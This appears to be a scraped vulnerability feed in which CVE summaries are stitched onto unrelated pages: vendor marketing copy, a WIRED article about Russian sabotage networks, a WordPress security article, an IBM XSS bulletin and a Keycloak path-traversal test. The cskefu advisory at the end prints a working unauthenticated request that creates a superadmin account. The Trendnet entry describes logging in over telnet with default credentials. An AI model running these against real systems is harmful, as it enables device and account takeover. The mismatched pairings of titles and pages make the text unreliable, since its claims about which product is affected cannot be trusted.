HireVue Hiring Platform V1.0 suffers from Use of a Broken or Risky Cryptographic Algorithm.

**Fast. Fair. Flexible.  
Finally, hiring technology that works how you want it to.**

HireVue is a talent experience platform designed to automate workflows and make scaling hiring easy. Improve how you, engage, screen and hire talent with text recruiting, assessments, and video interviewing software.

**Enterprise Security & Scale**

**Fast & Flexible Integrated Solutions**

**Fair & Transparent Hiring**

“For hiring managers like myself, it saves 20 minutes per candidate — when you’re interviewing 50 people a week, this soon adds up.”

We’re trusted by some of the world’s most recognizable brands.

**Hourly Hiring**

Hiring speed matters when hiring hourly workers. Keep your candidates engaged with text-powered solutions that offer 24/7/365 day engagement while assessments identify the critical skills needed for success.

Learn More

**Campus Hiring**

HireVue allows you to reach more students without traveling to more campuses. Reach this generation faster through text and video on their phones with solutions that support a full mobile hiring process. Candidates can text with recruiters and take interviews from any device–anytime and anywhere. Offer busy students flexibility during their candidate journey by offering on-demand and live video interviews and assessments. 

Learn More

**Professional Hiring**

Slow outdated processes will cost you top talent–and lost revenue. You need a hiring solution that allows your teams to move faster than the competition but doesn’t force them to sacrifice quality. HireVue’s solutions make recruiting and hiring teams more productive by consolidating steps and integrating seamlessly with your ATS. Reimagine how you recruit and hire with a faster process that allows you to focus on the skills that matter for success.

Learn More

**Technical Hiring**

Better understand the person behind the code. Find talent that can meet deadlines and work well in teams–and also know how to code. Consistently identify qualified talent, include engineers, developers and data scientists, with coding assessments and challenges that are fully validated by a team of Industrial-Organizational Psychologists.

Learn More 

Combat the labor shortage with a better candidate experience.

Read the 2022 Candidate Experience Guide.

Read How

CVE-2022-37177: HireVue Hiring Platform: Video Interviews, Assessment, Scheduling, AI, Chatbot | HireVue

Anti-Putin media network February Morning has become a central player in the underground fight against the Kremlin.

On the evening of August 20, Russian TV pundit and conspiracy theorist Darya Dugina was killed on the outskirts of Moscow when a powerful explosion ripped apart her Toyota Land Cruiser. Dugina was a vocal supporter of Russia's invasion of Ukraine and the daughter of fascist philosopher and writer Alexander Dugin, nicknamed “Putin’s brain” thanks to his perceived ties to Russian president Vladimir Putin. According to Russian authorities, a remote-controlled “explosive device,” presumably installed in her car, went off at around 9 pm local time.

News of Dugina’s assassination spread like wildfire through social media, most notably on the instant messaging service Telegram, where it was shared approvingly by a vast network of Russian and Ukrainian channels. But in the hours that followed, it became clear that one channel, operated by the media outlet Utro Fevralya, or February Morning, is more than just a place to share the news. It aims to play a key role in the story.

Created by exiled former Russian MP and dissident Ilya Ponomarev, February Morning was the first to report on a group claiming responsibility for Dugina’s death. Ponomarev himself took to YouTube, where February Morning airs its shows, claiming that the perpetrators were a little-known Russian resistance group called the National Republican Army. According to Ponomarev, an all-out war against “Putinism” had just begun.

While the National Republican Army’s involvement remains unconfirmed, Ponomarev’s announcement crystallized February Morning’s role as the center of gravity of a growing guerilla movement to spark revolution in Russia. The movement’s ecosystem includes activists and saboteurs of all types, from anarchists to fascists, connected through a network of Telegram channels and a singular goal: overthrowing Vladimir Putin.

Making History

On a sun-drenched balcony overlooking a busy street in downtown Kyiv, 48-year-old Evgeni Lesnoy smokes a final cigarette before going back on the air. The seasoned journalist is one of the faces of February Morning, which he joined shortly after its creation following Russia’s invasion of Ukraine in the early hours of February 24. “Because of my friends and relatives who stayed in Russia, I had been closely following the events there prior to February 24,” Lesnoy says in Russian. After his outspoken condemnation of the war in Donbas and the annexation of Crimea cost him his friends and, ultimately, his job, the journalist left Russia for Ukraine in 2015 and has been living with his husband in Kyiv ever since.

“When I was told that this project existed, I figured that this is where I needed to be,” he says, gesturing towards the TV studio in the next room. “Because I understand the context of what is happening inside Russia: I was born there, and I understand how people there think.”

Ponomarev, February Morning’s founder, is the only member of the Russian Duma to have voted against the 2014 annexation of Crimea. After the vote, he became persona non grata in Putin’s Russia, so he and his family fled to Ukraine’s capital city and started a new life. “For quite a long time, I had wanted to create a media aimed at a Russian audience, and that would broadcast from Kyiv,” he tells WIRED over Signal. “I tried to raise money for what I thought would be a Russian-language Al-Jazeera for maybe a year._”_ The venture was unsuccessful. But when Russian tanks crossed into Ukraine, the former MP and father of two joined the Territorial Defense in Kyiv, and the project took on new urgency. “After the first couple of days, many of my friends started telling me that now might be the time to revisit the idea of a media targeting Russians.”

The living room of the 18th-century apartment in which February Morning has taken residence is home to its television studio with a semicircular stage lit with a bluish light. Two screens broadcast in the background. When presenting the day’s show, Lesnoy sits before a small table draped with a white and blue tricolor flag—the symbol of the Russian opposition to the invasion—and that of Ukraine.

Broadcast on YouTube, the professionally produced daily programs try to counter the official Russian narrative surrounding the war, reporting on the atrocities committed by the “occupiers” against the Ukrainian population. “Putin’s supporters and apologists have big media organizations and prime-time news shows,'' says Lesnoy. “We want to give a voice to those who oppose the war.”

Which is what Ponomarev did on August 21, when he claimed on air that the National Republican Army assassinated Dugina—an act he described as “legitimate.” He also read the group’s purported manifesto, which called on all Russians to join the ranks of the National Republican Army and vow to destroy all those who have “usurped their power.”

February Morning’s insights into the domestic resistance movement in Russia stem from its 27 regional outlets, each with its own Telegram channel where activists and journalists mingle to gather and share news of anti-Putin actions. A binational team of around 70 journalists, technicians, and activists operates covertly in the far-flung regions of Russia and in Kyiv. In addition to its studio in Ukraine’s capital, the network brazenly broadcasts from Moscow. “I don't know how long the studio there will be able to operate, but even if the FSB shows up at the door and shuts us down, there will be another one,” says Ponomarev.

Whereas most media outlets only report the story, February Morning intends to be part of it. “We are referring to ourselves as the Russian ‘NEXTA,’ the Belarusian resource that played a key role in the protests two years ago following the reelection of Alexander Lukashenko,” says Ponomarev, referring to Belarus’ autocratic leader. “We want to be the resource that will play a critical role in the future revolutionary changes in the country.”

To this end, Ponomarev and his team have set up a Telegram channel known as Rospartizan, which has become an aggregator for information pertaining to the resistance to Putin and the war in Ukraine as well as a key recruitment tool. Every day, Rospartizan relays the latest developments across Russia, from the torching of a military recruitment office to the unfurling of an antiwar banner in front of the Russian Ministry of Defense building in Moscow.

According to Ponomarev, representatives of the National Republican Army first made contact with him through Rospartizan, a testament to the channel’s growing notoriety. “We are providing, in my opinion, the most comprehensive news stream on what is going on in Russian regions, in terms of acts of sabotage and the actual resistance,” says Ponomarev. The National Republican Army’s manifesto concludes, “stay in contact with us through the Rospartizan Telegram channel.”

With more than 26,000 followers, Rospartizan embraces anyone who’s anti-Putin, no matter their political ideology—a feature, not a bug, according to Ponomarev, a former Communist Party member and self-described “social globalist.”

“I am right now not only reaching out, but very actively interacting with not only my friends on the left side of the political spectrum,” he says, “but also with people on the far-right, who we are usually fighting with.”

The Enemy of My Enemy

Roman Popkov, the former head of the Moscow branch of the National-Bolshevik party, falls into that far-right camp. Popkov used to be a member of the influential Russian National Unity, a now-defunct neo-Nazi group responsible for a string of racist crimes, before joining the political party founded by controversial Russian writer, poet, and dissident Eduard Limonov, who sought to unite far-left and far-right radicals on the same platform.

In 2006, after years of harassment by Russian security forces, Popkov was arrested and spent more than two years in pretrial detention in the infamous Butyrka prison. The European Court of Human Rights ruled that his detention was illegal, and his arrest is widely considered to have been motivated by his political activism.

Popkov, now residing in Ukraine, works as a journalist for a number of independent media outlets, and is the head of a recently launched media project called Poslezavtra, or “The Day After Tomorrow.” An “old friend” of Ponomarev, Popkov has featured extensively on February Morning’s shows and took part in the broadcast that followed Dugina’s assassination.

“We are covering direct actions targeting the military and the apparatus of political repression of Putin's regime,'' Popkov says over the phone. “First of all, we are trying to inspire people, to get them to act, and second, we inform and report on what is being done.”

Like Ponomarev, Popkov stresses that activists’ ideologies are not as important as a willingness to defy Putin’s regime and to oppose the war in Ukraine.

“Our collective unites people opposed to Putin's regime, with different political views and ideologies,” says Popkov. “At the moment, it's not that important if one is an anarchist, a nationalist, or a liberal as, since Russia is not a democracy, we have no representation in parliament, and can't vote for our candidates.”

According to Popkov, acts of sabotage in Russia are mostly the work of small-scale far-right and far-left groups, the most famous of those being the Anarcho-Communist Combat Organization, or BO-AK. The organization rose to prominence after it sabotaged the railway leading to a Russian military arsenal in the small town of Kirzach, 100 km east of Moscow. The group shared photos of the sabotage on their own Telegram channel, which quickly spread to other anti-Putin channels, including Rospartizan, and was soon featured on February Morning’s broadcast.

Yet even the staunch anarchists of the BO-AK acknowledge the need to reach out to the other side of the political spectrum. “Most of our contacts are from our ideological camp, but not all,” an anonymous representative of the group tells WIRED. “We believe that alliances with different forces are necessary in our struggle.”

The anarchists of the BO-AK consider direct actions and acts of sabotage as the best way to kickstart the social revolution, a view shared by many members of Rospartizan. In addition to two sabotage operations targeting military railways, the BO-AK claims to have set fire to a cell phone tower in the Belgorod region “in order to damage Putin’s army communications in Ukraine.”

“Only those who can back it with their actions can call themselves the opposition,” an anonymous contributor to Rospartizan says over Telegram, “be them a Molotov cocktail thrown at a military recruitment office, a wire strung across train tracks, or a gas canister taken to the car of a regime collaborator.”

Dangerous Cocktails

Inspired by the Belarusian resistance to Lukashenko and the protestors’ innovative use of Telegram, Popkov, Ponomarev, and activists like the anarchists of BO-AK have turned to social media to organize, recruit, and incite people to act against the war and Putin’s increasingly authoritarian regime.

“Telegram is a less censored, more intelligent, and politicized social network. A large part of our immediate target audience is present here—people who are potentially interested in radical politics,_”_ says the BO-AK. “This is where lies the usefulness of social networks for campaigning and education—they are an excellent channel for broadcasting and communicating.”

Antiwar activists in Ukraine and in Russia have taken full advantage of the relative anonymity Telegram provides. A website known as Ostanovi Vagony, or “Stop the Wagon,” and its associated Telegram channel aim to educate Russian would-be partisans on the safest, most effective ways to sabotage the railway system. Meanwhile, a Telegram channel created in late May called Gromko (“loud” in Russian) creates sleek infographics explaining how to make a Molotov cocktail—described as the best way to disable the car of a Putin sympathizer—or how to deface the regime’s propaganda posters.

This material is regularly shared by Ponomarev's Rospartizan, which has become a central conduit for guerrilla efforts to rally new recruits, spread information and news, and, purportedly, to facilitate the assassination of a high-profile regime collaborator. In an interview with Russian independent media Meduza, Ponomarev claimed to have known in advance that “something was going to happen” ahead of Dugina’s assassination. He further claimed that he helped the National Republican Army exfiltrate Natalya Volk, the woman whom Russian security services named as the main suspect in her death: “Sometimes people need to be saved from FSB persecution, they need to be pulled out of Russia—we pull them out.”

Telegram did not respond to WIRED's request for comment.

While unconfirmed, the number of acts of sabotage targeting military and state infrastructure in Russia appears to grow weekly. According to Russian independent media Insider, there have been more than 20 attacks on military registration and enlistment offices in Russia (which were reported by the media and Telegram channels), most of which were arson. “There were no similar incidents last year,” notes Insider journalist Alisa Zemlyanskaya, writing under a pseudonym. Meanwhile, an estimated 63 freight trains derailed in Russia between March and June, a significant increase compared to the same period last year.

Russian authorities, eager to downplay the significance of the apparent sabotage efforts, have blamed those incidents on the poor condition of the railway system. The scale of guerrilla attacks on Russian entities remains, therefore, difficult to assess.

“When it comes to railway sabotage especially, it's difficult, or even impossible, to tell if it’s sabotage, or if it’s an accident due to a technical problem, or to the incompetence of the authorities,” says Popkov.

According to the BO-AK—whose members signed the sabotaged section of rail in Kirzach with the name of their group and the link to its Telegram channel—“that’s because many guerrilla groups do not leave any message or position themselves in the media in any way.”

“In any case, every week there are several reports of railway sabotage, the destruction of power lines, and other acts of resistance,” says the group. “This suggests that the guerrilla movement is not a mass movement, but a fairly large-scale one.”

Russian security services are quick to blame infiltrated Ukrainian saboteurs for these attacks. Regardless of who’s behind them, acts of sabotage continue unabated: On August 17, yet another freight train derailed near Mogilev, in Belarus, while last Wednesday, a man threw two Molotov cocktails at the regional administration building in Oryol, in western Russia.

Fire-bombing a car or derailing a Russian train can, of course, carry significant penalties. But even less extreme activities are dangerous, especially in light of a slew of new repressive Russian laws. In July, lawmakers updated Russia’s Criminal Code to crack down on working with “foreign states and organizations,” public activities “directed against the security of the state,” and the production and public display of “Nazi paraphernalia or symbols.” Because Putin has repeatedly claimed, baselessly, that Ukraine was run by a clique of drug addicts and Nazis and cited “denazification” as one of the primary motivators of his invasion, this last amendment could potentially land an antiwar protestor waving a Ukrainian flag in prison.

According to Russian independent media OVD-Info, authorities in Russia detained some 16,500 people between February and July for having taken part in protests or actions against the war.

Activists and dissidents both in Russia and abroad expose themselves to retaliation from Putin’s regime—a fact that they are acutely aware of. “I'm a reasonable person, I don’t think I'm invulnerable or immortal,” Ponomarev says. “So I do understand that there are issues with security and everything. But I have done a lot of effort to protect myself and the place where I live, as well as the way I move across the city.” Those concerns have been heightened following Dugina’s assassination and Ponomarev’s subsequent declarations. On August 21, a member of the Russian government proposed a contest for the best video or photo of the dissident politician “crawling on broken legs and apologizing while spitting his teeth.”

“I’m not going to pretend that I am not scared at all,” says February Morning’s Lesnoy after his last interview of the day had ended. “But I live in Ukraine, where Putin is waging war. Everybody here is at risk.”

When asked about their motivation for joining the resistance and potentially exposing themselves to repression, an anonymous contributor to Rospartizan summed it up simply: “Let us use the platitude, ‘who else if not us?’”

The Telegram-Powered News Outlet Waging Guerrilla War on Russia

Linksys E1200 v1.0.04 is vulnerable to Buffer Overflow via ej_get_web_page_name.

**Shop by Category**

Intelligent Mesh™ allows you to expand your network easily with additional routers or nodes.

Seamless coverage throughout your home.

Always offering the highest speeds makes our fast WiFi, even faster.

The latest WiFi standard gives you 5x the speed.

"This router has made an enormous difference in speed and range with our device connectivity. We have no more dead spots and can even access the signal in the front and back yards. It’s speedier too! This is a highly recommended upgrade."

Amanda M

Canton, OH

"This is the 3rd Linksys router I have had and would not install anything else."

Brian V.

Iowa

"I've been a networking guy for years and Linksys is who kind of pioneered home networking in a sense. They did it again with another well designed product."

Matt Dean

Watkinsville, GA

"We love the Linksys brand and trust that it will be a reliable product."

Maluna Kai

Orange, CA

**Shop Customer Favorites**

Best Seller

Best Seller

Best Seller

Best Seller

**Why buy directly from Linksys?**

 

****Fast Free Shipping****

 

****Hassle-free returns****

 

****Simple, secure checkout****

CVE-2022-38555: Linksys | Networking & WiFi Technology

Trendnet TEW733GR v1.03B01 contains a Static Default Credential vulnerability in /etc/init0.d/S80telnetd.sh.

**TRENDnet TEW733GR contains Static Default Credential Vulnerability****overview**

*   type: static default credential vulnerability
    
*   supplier: TRENDnet (https://www.trendnet.com/)
    
*   product: TRENDnet TEW733GR
    
*   firmware download: https://downloads.trendnet.com/tew-733gr/firmware/tew-733grv1\_(fw1.03b01).zip
    
*   affect version: TRENDnet TEW733GR v1.03B01
    

TRENDnet's N300 Wireless Gigabit Router, model TEW-733GR, offers proven high performance 300 Mbps Wireless N networking and gigabit wired Ethernet ports. Embedded GREENnet technology reduces power consumption by up to 50%. For your convenience this router comes pre-encrypted and features a guest network. Seamlessly stream HD video with this powerful router.

**Description****1\. Vulnerability Details**

A vulnerability in the Telnet service of Trendnet 733GR could allow an unauthenticated, remote attacker to take full control of the device . The vulnerability exists because a system account has a default and static password. An attacker could exploit this vulnerability by using this default account to connect to the affected system. A successful exploit could allow the attacker to gain full control of an affected device.

In /etc/init0.d/S80telnetd.sh

**2\. Recurring loopholes and POC**

To reproduce the vulnerability, the following steps can be followed:

Start frimware through QEMU system or other methods (real device)

use the default username and password to login telnet

CVE-2022-38556: Vuln/2 at main · xxy1126/Vuln

By Owais Sultan
Currently, there are over 455 million websites powered by WordPress which highlights the fact that this open-source content management system is a lucrative target for cybercriminals and why security should be the top priority of WP users.
This is a post from HackRead.com Read the original post: 5 Signs your WordPress Site is Hacked (And How to Fix It)

Yes, there are signs that your WordPress or any website has been hacked, and yes there are ways to fix it. This article offers five ways you can tell if your website has been hacked, and then offers a few ways to solve the hack.

Remember that a malicious attacker has several ways of gaining access. It may be malware or a nefarious plugin, but it may be something more sinister like your email has been hacked or your smartphone/computer has spyware. Here are a few signs that your website has been hacked.

**1 – You Are Unable to Log Into Your Account**

If you are unable to log into your account, then that is a classic sign that you have been hacked. Yet, despite being a classic sign, it is one of the least common issues. Many hackers don’t want you to notice that you have been hacked. This allows them to keep gathering your customer information and/or keeps you working on your website so they can keep exploiting it. 

There are some great WordPress hacks where you have to log in two or three times. It will say that your password is incorrect the first one or two times, and the third time it will let you in. This is because the WordPress hack is actually processing your request. By your third attempt at your real password, you are allowed access and any trace of the hacker has disappeared.

**2 – Unknown Files and Scripts**

For those of you who know about programming, you may be able to scrub your own website clean of any malware and security risks. If you have the skills, you can look over your WordPress code, you may notice unknown scripts and possibly unknown files in your WordPress. This is often because of nefarious plugins leaving their files behind that may be used by hackers or other malware at a later date.

**3 – Your Website Started Going Slow**

This is a signal that somebody is using your website for nefarious reasons. It can be anything, from people hotlinking from your images and using up your bandwidth, to spammed people being redirected from your Google safe website to one of their nefarious ones.

Another reason your website may take a lot longer to load than is normal is that it may be compromised and used as part of a botnet on a larger scale. In 2018, researchers identified 20,000 compromised WordPress websites working as a botnet to carry out cyber attacks.

**4 – Odd Additions to Your Website**

A silly trick is to add pop-ups to your website. It is silly because it alerts you to the hack and causes you to react. In reality, they will add links to spam websites where your innocent viewers will be ripped off. After a while, you will be banned by search engines for being a suspicious website.

**5 – Your Traffic or Affiliate Revenue is Down**

This is another classic sign that your website has been hacked. The attacker is using your traffic and maybe even your affiliate money for his or her own ends. Often, it is odd behavior in your analytics that alerts you to a WordPress hack.

**How to Fix it**

First things first, you’ll need to identify the source of the attack. If not, you can check your server access logs. Once you know where the attack came from, you can take steps to block that IP address.

Then you need to start changing your passwords – for your WordPress account, as well as any FTP or hosting accounts associated with your site. Be sure to use strong passwords that are difficult to guess.

In addition, you could change the primary email for WordPress just in case that is the problem. You need to go through your plugins to figure out if any of those have caused the problem. If you have a security plugin installed, check its logs to see if there are any clues.

You need to go through the people you have given permission to because they may have fallen for a WordPress scam or a fake website and unknowingly given their information away.

You may also need to suspect your web host too because they are often hacked or expose customer data online without any security authentication.

If you are still unsure get in touch with a website security company like Sucuri or a service like WP-Masters to let them run through your website, fix it up, remove the hackers, remove the malware, and regain full control over your website. It is often the only definitive way to regain full control of your website. Finally, you’ll need to clean up any malicious code that may have been injected into your site.

1.  Tips for Using Uploader Widgets on WordPress Blogs
2.  5 WordPress Security Solutions with Free SSL Certificates
3.  Critical WordPress plugin vulnerability allowed wiping databases
4.  WordPress GDPR Compliance plugin hacked to spread backdoors
5.  Steps to assess an employee before granting WordPress admin access

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

5 Signs your WordPress Site is Hacked (And How to Fix It)

ClassLoaderTheme and ClasspathThemeResourceProviderFactory allows reading any file available as a resource to the classloader. By sending requests for theme resources with a relative path from an external HTTP client, the client will receive the content of random files if available.

**Keycloak has Files or Directories Accessible to External Parties**

Moderate severity GitHub Reviewed Published Aug 27, 2022 • Updated Sep 2, 2022

GHSA-3w4v-rvc4-2xpw: Keycloak has Files or Directories Accessible to External Parties

IBM Maximo Asset Management 7.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 231116.

  

**Summary**

IBM Maximo Asset Management and the IBM Maximo Manage application in IBM Maximo Application Suite are vulnerable to cross-site scripting.

**Vulnerability Details**

**CVEID:**   CVE-2022-35714  
**DESCRIPTION:**   IBM Maximo Asset Management is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/231116 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

This vulnerability affects the following versions of the IBM Maximo Asset Management core product and IBM Maximo Manage Application in IBM Maximo Application Suite.  Older versions of Maximo Asset Management may be impacted. The recommended action is to update to the latest version.

**Product versions affected:**

Affected Product(s)

Version(s)

IBM Maximo Asset Management

7.6.1.2

IBM Maximo Asset Management

7.6.1.1

Manage Component

8.3

\* To determine the core product version, log in and view System Information. The core product version is the "Tivoli's process automation engine" version. Please consult the Platform Matrix for a list of supported product combinations.

  

**Remediation/Fixes**

The recommended solution is to download the appropriate Interim Fix or Fix Pack from Fix Central (What is Fix Central?) and apply for each affected product as soon as possible. Please see below for information on the fixes available for each product, version, and release. Follow the installation instructions in the ‘readme’ documentation provided with each fix pack or interim fix.

**For Maximo Asset Management 7.6:**

**For IBM Maximo Manage application in IBM Maximo Application Suite:**

First upgrade to Maximo Application Suite version 8.7.3 and then from the Catalog select Update Available for Manage 8.3.3.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

15 Jul 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLKT6","label":"Maximo Asset Management"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL9Z","label":"Maximo for Transportation"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.2.5, 7.6.2.4, 7.6.2.3","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSWT9A","label":"Control Desk"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1.1, 7.6.1","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS5RRF","label":"IBM Maximo for Aviation"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.8, 7.6.7, 7.6.6","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU005","label":"IoT"},"Product":{"code":"SSKVFR","label":"Maximo for Service Providers"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.3.3, 7.6.3.2, 7.6.3.1","Edition":""},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL84","label":"Maximo for Life Sciences"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLLAM","label":"Maximo for Utilities"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.0.2, 7.6.0.1","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL8M","label":"Maximo for Nuclear Power"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSG2D3","label":"Maximo Spatial Asset Management"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.0.5, 7.6.0.4, 7.6.0.3, 7.6.0.2","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL9G","label":"Maximo for Oil and Gas"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLKSJ","label":"Maximo Asset Configuration Manager"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.7.1, 7.6.7, 7.6.6","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2022-35714: Security Bulletin: IBM Maximo Asset Management and the IBM Maximo Manage application in IBM Maximo Application Suite are vulnerable to cross-site scripting (CVE-2022-35714)

@@ -73,6 +73,18 @@ public void getMessages() {

});

}

  

@Test

public void getResourceIllegalTraversal() {

testingClient.server().run(session -> {

try {

Theme theme = session.theme().getTheme("base", Theme.Type.LOGIN);

Assert.assertNull(theme.getResourceAsStream("../templates/test.ftl"));

} catch (IOException e) {

Assert.fail(e.getMessage());

}

});

}

  

@Test

public void gzipEncoding() throws IOException {

final String resourcesVersion = testingClient.server().fetch(session -> Version.RESOURCES\_VERSION, String.class);

CVE-2021-3856: [KEYCLOAK-19422] ClassLoaderTheme and ClasspathThemeResourceProviderF… · keycloak/keycloak@73f0474

Insecure permissions in cskefu v7.0.1 allows unauthenticated attackers to arbitrarily add administrator accounts.

**概述**

存在添加管理员接口，调用该接口时没有对当前用户进行校验，导致未登录状态下可添加管理员账户。  
There is an interface to add an administrator. When calling this interface, the current user is not verified, so that an administrator account can be added when not logged in.

**数据包（payload）：**

GET /addAdmin?username\=admin666&password\=admin666123&email\=admin666@admin6666.com&mobile\=17777777776&superadmin\=true HTTP/1.1
Host: localhost
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: none
Sec\-Fetch\-User: ?1
Cache\-Control: max\-age\=0

\*\* 测试截图（Test screenshot）： \*\*  

根据给出的URL  
According to the given URL  
http://localhost/?schema=http&port=80&hostname=localhost&subtype=user&maintype=apps&typename=methodName&orgi=cskefu&webimport=8036&sessionid=f8dbdd6d51dd44788ccad36c02e7958b&models=cca&models=chatbot&models=report&models=entim&models=contacts&ip=172.18.0.1&userExpTelemetry=on

跳转至管理界面  
Jump to the management interface  

**漏洞分析（Vulnerability analysis）**  
漏洞源码（Vulnerability source code）：

 @RequestMapping("/addAdmin")
    @Menu(type = "apps", subtype = "user", access = true)
    public ModelAndView addAdmin(HttpServletRequest request, HttpServletResponse response, @Valid User user) {
        String msg = "";
        msg = validUser(user);
        if (StringUtils.isNotBlank(msg)) {
            return request(super.createView("redirect:/register.html?msg=" + msg));
        } else {
            user.setUname(user.getUsername());
            user.setAdmin(true);
            if (StringUtils.isNotBlank(user.getPassword())) {
                user.setPassword(MainUtils.md5(user.getPassword()));
            }
            user.setOrgi(super.getOrgi());
            userRepository.save(user);
        }
        ModelAndView view = this.processLogin(request, user, "");
        return view;
    }

    private String validUser(User user) {
        String msg = "";
        User tempUser = userRepository.findByUsernameAndDatastatus(user.getUsername(), false);
        if (tempUser != null) {
            msg = "username\_exist";
            return msg;
        }
        tempUser = userRepository.findByEmailAndDatastatus(user.getEmail(), false);
        if (tempUser != null) {
            msg = "email\_exist";
            return msg;
        }
        tempUser = userRepository.findByMobileAndDatastatus(user.getMobile(), false);
        if (tempUser != null) {
            msg = "mobile\_exist";
            return msg;
        }
        return msg;
    }

addAdmin接口未进行权限校验，未登录状态可直接调用  
The addadmin interface does not perform permission verification, and can be called directly in the unregistered state

增加用户前，判断传入的用户是否有效  
Before adding users, judge whether the incoming users are valid  

为了顺利到达最后一个return，传入的username，email，mobile都必须为数据库中的唯一值  
n order to successfully reach the last return, the username, email and mobile passed in must be unique values in the database  

当返回的msg为空时，我们就可以继续增加用户的操作，且将添加的用户设置为管理员  
When the returned MSG is empty, we can continue to add users and set the added users as administrators  

**操作系统**

*   macOS or Mac OSX
*   Windows
*   Linux(Debian, CentOS, Ubuntu, etc.)

**代码版本**

代码版本 <= 7.0.1

**祝福与不祝福**

春松客服之所以开源，是基于这样一种信念：爱人也是爱己，利他也是利己。  
对人和人美好关系的向往，对人潜力的信任。让我们相信因春松客服而受益的人，会回报给春松客服开源社区，我们所有贡献者基于共赢的信念合作。  
回报方式包括：提交 PR、购买春松客服相关的付费产品和服务等。

因春松客服受益，而不回报开源社区的用户，我们不欢迎使用春松客服：我们开源并不是为了你们，你们是不被祝福的。

**Open Source for the World**

